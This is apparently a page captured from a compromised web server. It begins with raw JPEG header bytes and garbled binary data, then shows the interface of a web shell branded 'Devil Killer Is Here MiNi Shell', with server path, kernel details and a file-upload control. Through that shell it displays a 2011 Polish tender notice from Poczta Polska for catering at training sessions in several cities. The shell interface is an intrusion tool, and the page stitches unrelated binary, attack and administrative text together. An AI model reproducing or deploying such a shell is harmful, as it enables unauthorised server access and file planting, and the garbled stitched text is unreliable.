JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110222/26688-N-2011.html

<p class="kh_header"><b>Kraków: Usługi gastronomiczne związane ze szkoleniami organizowanymi na terenie Krakowa, Tarnowa, Nowego Sącza, Przemyśla, Miejsca Piastowego k/Krosna oraz Rzeszowa z podziałem na części</b><br>
<b>Numer ogłoszenia: 26688 - 2011; data zamieszczenia: 22.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Bronowicka 44, 30-093 Kraków, woj. małopolskie, tel. 12 6190516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi gastronomiczne związane ze szkoleniami organizowanymi na terenie Krakowa, Tarnowa, Nowego Sącza, Przemyśla, Miejsca Piastowego k/Krosna oraz Rzeszowa z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie, dostarczenie i podawanie posiłków oraz serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych Poczty Polskiej S.A. Usługa polega na dostarczeniu zamówionych ilości posiłków, serwisów kawowych określonych poniżej w dniach szkoleń uzgodnionych między Zamawiającym a Wykonawcą.
	Zamówienie jest podzielone na 6 części.

CZĘŚĆ I  - Przygotowanie, dostarczenie i podawanie posiłków oraz serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A. na terenie Krakowa

a)	wyżywienie całodniowe składające się ze śniadania, obiadu, kolacji, serwisu kawowego na 1 uczestnika szkolenia - dla maksymalnie 650 osób. 
  	W ramach poszczególnych posiłków oczekujemy (normatyw usługi gastronomicznej na jednego uczestnika):
- śniadanie - dwie bułki z dwoma plasterkami szynki i dwoma plasterkami sera żółtego, masło 30 g., kawa rozpuszczalna - 5 g., śmietanka do kawy 20 g., sok z cytryny do herbaty w opakowaniu jednorazowym 15 g., herbata ekspresowa 1 szt, cukier 20 g., kubek do napojów gorących - 2 szt., łyżeczka - 2 szt, talerz jednorazowy 1 szt., nóż plastikowy 1 szt.
	- obiad - zupa ok. 400 g.  oraz jedno danie mięsne o wartości (ilości) tradycyjnego obiadu danie mięsne np. kotlet mielony 200 g., ziemniaki 200 g., surówka 150 g., oraz sok  pomarańczowy ok. 200 g. kubek do napojów zimnych 1 szt., talerz jednorazowy do zupy 1 szt., talerz jednorazowy do drugiego dania 1 szt., jednorazowa łyżka 1 szt., jednorazowy nóż 1 szt., jednorazowy widelec 1 szt.
- serwis kawowego - składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

	- kolacja  - dwie bułki z dwoma plasterkami szynki i dwoma plasterkami sera żółtego, masło 30 g., sok z cytryny do herbaty w opakowaniu jednorazowym 7,5 g., herbata ekspresowa 1 szt, cukier 20 g., kubek do napojów gorących - 2 szt., łyżeczka - 2 szt, talerz jednorazowy 1 szt., nóż plastikowy 1 szt.

Zleceniobiorca powinien dostarczyć serwis kawowy i śniadanie oraz przygotować go na sali szkoleniowej (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. 
Zleceniobiorca dostarczy i przygotuje obiad podczas ustalonej ze Zleceniodawcą przerwy szkoleniowej. Kolacja w pojemniku na wynos zostanie dostarczona przez Zleceniobiorcę podczas dowozu obiadu.
Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.
 
b)	serwis kawowy - dla maksymalnie 3676 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy oraz przygotować go na sali szkoleniowej (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

c)	obiad i serwis kawowy  - dla maksymalnie 50 osób
	- obiad - zupa ok. 400 g.  oraz jedno danie mięsne o wartości (ilości) tradycyjnego obiadu danie mięsne np. kotlet mielony 200 g., ziemniaki 200 g., surówka 150 g., oraz sok  pomarańczowy ok. 200 g. kubek do napojów zimnych 1 szt., talerz jednorazowy do zupy 1 szt., talerz jednorazowy do drugiego dania 1 szt., jednorazowa łyżka 1 szt., jednorazowy nóż 1 szt., jednorazowy widelec 1 szt.
- serwisu kawowego składającego się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy  oraz przygotować go na sali szkoleniowej (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej)  przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. Zleceniobiorca dostarczy i przygotuje obiad podczas ustalonej ze Zleceniodawcą przerwy szkoleniowej. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi na terenie miasta Krakowa: 
- ul. Prokocimska 6 w Krakowie,
- ul. Cystersów 21 w Krakowie,
- ul. Westerplatte 20 w Krakowie,
- ul. Grochowska 2 w Krakowie,
- ul. Lubicz 4 w Krakowie,
- os. Złotej Jesieni 7 w Krakowie.

CZĘŚĆ II  -  Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Tarnowa.

Serwis kawowy - dla maksymalnie 628 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5 g.

Zleceniobiorca powinien dostarczyć serwis kawowy i przygotować zamówienie (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi na terenie miasta Tarnowa: 
- ul. Mickiewicza 6 w Tarnowie,
- Pl. Dworcowy 2 w Tarnowie

CZĘŚĆ III Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Nowego Sącza.

Serwis kawowy - dla maksymalnie 408 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy i przygotować zamówienie (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi na terenie miasta Nowego Sącza: 
	- ul. Dunajewskiego 10 Nowy Sącz

CZĘŚĆ IV  -  Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Przemyśla

Serwis kawowy - dla maksymalnie 386 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy i przygotować zamówienie (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi na terenie miasta Przemyśla: 
- ul. 3 Maja 25 Przemyśl.

CZĘŚĆ V  -  Przygotowanie i dostarczenie serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie Miejsca Piastowego k/Krosna

Serwis kawowy - dla maksymalnie 531 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5 g.

Zleceniobiorca powinien dostarczyć serwis kawowy i przygotować zamówienie (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi - 38-430 Miejsce Piastowe ul. Krośnieńska 5b. 

CZĘŚĆ VI  -  Przygotowanie, dostarczenie i podawanie posiłków oraz serwisów kawowych podczas szkoleń organizowanych w salach szkoleniowych PP S.A na terenie  Rzeszowa

a)	wyżywienie całodniowe składające się ze śniadania, obiadu, kolacji, serwisu kawowego na 1 uczestnika szkolenia - dla maksymalnie 108 osób. 
 	W ramach poszczególnych posiłków oczekujemy (normatyw usługi gastronomicznej na jednego uczestnika):
- śniadanie - dwie bułki z dwoma plasterkami szynki i dwoma plasterkami sera żółtego, masło 30 g., kawa rozpuszczalna - 5 g., śmietanka do kawy 20 g., sok z cytryny do herbaty w opakowaniu jednorazowym 15 g., herbata ekspresowa 1 szt, cukier 20 g., kubek do napojów gorących - 2 szt., łyżeczka - 2 szt, talerz jednorazowy 1 szt., nóż plastikowy 1 szt.
	- obiad - zupa ok. 400 g.  oraz jedno danie mięsne o wartości (ilości) tradycyjnego obiadu danie mięsne np. kotlet mielony 200 g., ziemniaki 200 g., surówka 150 g., oraz sok  pomarańczowy ok. 200 g. kubek do napojów zimnych 1 szt., talerz jednorazowy do zupy 1 szt., talerz jednorazowy do drugiego dania 1 szt., jednorazowa łyżka 1 szt., jednorazowy nóż 1 szt., jednorazowy widelec 1 szt.
- serwis kawowy składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

	- kolacja - dwie bułki z dwoma plasterkami szynki i dwoma plasterkami sera żółtego, masło 30 g., sok z cytryny do herbaty w opakowaniu jednorazowym 10 g., herbata ekspresowa 1 szt, cukier 20 g., kubek do napojów gorących - 2 szt., łyżeczka - 2 szt, talerz jednorazowy 1 szt., nóż plastikowy 1 szt.

Zleceniobiorca powinien dostarczyć serwis kawowy i śniadanie oraz przygotować go na sali szkoleniowej przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. 
Zleceniobiorca dostarczy i przygotuje obiad podczas ustalonej ze Zleceniodawcą przerwy szkoleniowej. Kolacja w pojemniku na wynos zostanie dostarczona przez Zleceniobiorcę podczas dowozu obiadu.
Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.
 
b)	serwis kawowy - dla maksymalnie 650 osób składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy oraz przygotować go na Sali szkoleniowej (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej) przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

c)	obiad i serwis kawowy - dla maksymalnie 60 osób
	- obiad - zupa ok. 400 g.  oraz jedno danie mięsne o wartości (ilości) tradycyjnego obiadu danie mięsne np. kotlet mielony 200 g., ziemniaki 200 g., surówka 150 g., oraz sok  pomarańczowy ok. 200 g. kubek do napojów zimnych 1 szt., talerz jednorazowy do zupy 1 szt., talerz jednorazowy do drugiego dania 1 szt., jednorazowa łyżka 1 szt., jednorazowy nóż 1 szt., jednorazowy widelec 1 szt.
- serwis kawowy składający się z (normatyw usługi gastronomicznej na jednego uczestnika) :
-	woda mineralna niegazowana 0,25 l.,
-	woda mineralna gazowana 0,25 l.,
-	herbata czarna, ekspresowa   - 2 szt.,
-	kawa rozpuszczalna - 5 g.,
-	kawa mielona - 5 g.,
-	mleko niesłodzone zagęszczone - 20 g.,
-	cukier - 20 g.,
-	ciastka kruche - 50  g.,
-	krążek biszkoptowy np. delicje szampańskie - 50 g.,
-	paluszki słone - 30 g.,
-	kubek do napojów zimnych- 1 szt.,
-	kubek do napojów gorących - 2 szt.,
-	łyżeczka - 2 szt.,
-	sok z cytryny do herbaty w opakowaniu jednorazowym - 7,5g.

Zleceniobiorca powinien dostarczyć serwis kawowy  oraz przygotować go na sali szkoleniowej (rozpakowanie artykułów w wydzielonym miejscu na sali szkoleniowej)  przed rozpoczęciem szkolenia w miejscu i czasie wskazanym przez Zleceniodawcę. Zleceniobiorca dostarczy i przygotuje obiad podczas ustalonej ze Zleceniodawcą przerwy szkoleniowej. Nie jest wymagana obecność Zleceniobiorcy podczas trwania szkolenia jak również sprzątania sali szkoleniowej po jego zakończeniu.

Miejsce realizacji usługi na terenie miasta Rzeszowa: 
- ul. Asnyka 5 Rzeszów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W celu wykazania spełniania przez wykonawcę warunku Wykonawca jest zobowiązany przedstawić:

	Wykaz wykonanych (zrealizowanych i rozliczonych) usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ilości obsługiwanych osób, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie.

Za spełnienie tego warunku zamawiający uzna wykazanie przez Wykonawcę, iż należycie wykonał w powyższym okresie usługi gastronomiczne polegające na całodniowym wyżywieniu:
- dla cz. I  -   co najmniej 300 osób
- dla cz. VI -   co najmniej 50 osób 
W przypadku złożenia oferty obejmującej cz. I i VI, należy wykazać się doświadczeniem w zakresie realizacji w/w usług gastronomicznych dla sumy osób, jaka jest wymagana w tych częściach zamówienia.

W tym celu wykonawca musi sporządzić i podpisać wykaz usług wg schematu oraz musi załączyć do oferty dokumenty potwierdzające, że usługi te zostały wykonane należycie. 

Za dokumenty potwierdzające należyte wykonanie usług określonych w wykazie, Zamawiający uzna np. referencje. Przez wykonaną usługę należy rozumieć wykonaną umowę.
Załączone dokumenty winny w sposób jednoznaczny wskazywać usługi wykazane oraz potwierdzać ich należyte wykonanie.

W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

2.	Celem potwierdzenia spełniania warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy p.z.p. wykonawca składa podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
